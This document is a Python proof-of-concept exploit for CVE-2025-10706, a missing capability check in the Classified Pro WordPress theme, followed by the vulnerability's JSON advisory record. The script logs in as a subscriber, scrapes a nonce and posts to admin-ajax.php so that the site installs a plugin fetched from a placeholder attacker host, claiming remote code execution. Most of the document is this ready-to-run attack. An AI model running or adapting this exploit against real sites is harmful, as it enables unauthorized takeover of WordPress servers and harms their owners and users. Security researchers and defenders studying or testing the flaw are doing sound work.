CVE-2025-10706

# CVE-2025-10706 PoC - Classified Pro Unauthorized Plugin Installation # This PoC demonstrates how a subscriber-level user can install arbitrary plugins import requests import re # Target configuration TARGET_URL = "https://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "user_password" # Step 1: Login as subscriber to get session cookies and nonce session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f'{TARGET_URL}/wp-admin/', 'testcookie': '1' } session.post(f'{TARGET_URL}/wp-login.php', data=login_data) # Step 2: Get nonce from CubeWP Framework plugin page # The nonce is required from CubeWP Framework plugin admin_page = session.get(f'{TARGET_URL}/wp-admin/admin.php?page=cubewp-framework') nonce_match = re.search(r'_wpnonce["\s:=]+([a-f0-9]+)', admin_page.text) if nonce_match: nonce = nonce_match.group(1) else: # Alternative: extract from any page containing cubewp nonce nonce_match = re.search(r'cwp_addons_nonce["\s:=]+([a-f0-9]+)', admin_page.text) nonce = nonce_match.group(1) if nonce_match else "EXTRACTED_NONCE" # Step 3: Exploit the missing capability check in cwp_addons_update_plugin_cb # This endpoint should require admin privileges but doesn't malicious_plugin_url = "https://attacker.com/malicious-plugin.zip" exploit_data = { 'action': 'cwp_addons_update_plugin_cb', '_wpnonce': nonce, 'plugin_url': malicious_plugin_url, 'plugin_slug': 'malicious-plugin' } # Step 4: Send the exploit request response = session.post( f'{TARGET_URL}/wp-admin/admin-ajax.php', data=exploit_data ) if response.status_code == 200 and 'success' in response.text.lower(): print("[+] Plugin installation initiated successfully!") print("[+] Remote code execution achieved via malicious plugin") else: print(f"[-] Exploit failed: {response.text}")

{"cve": {"id": "CVE-2025-10706", "sourceIdentifier": "[email protected]", "published": "2025-10-16T07:15:32.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Classified Pro theme for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check in the 'cwp_addons_update_plugin_cb' function in all versions up to, and including, 1.0.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins on the affected site's server which may make remote code execution possible. Note: The required nonce for the vulnerability is in the CubeWP Framework plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://themeforest.net/item/classifiedpro-recommerce-classified-wordpress-theme/44528010", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2954583e-4ebe-4658-b132-0085f2b1cf08?source=cve", "source": "[email protected]"}]}}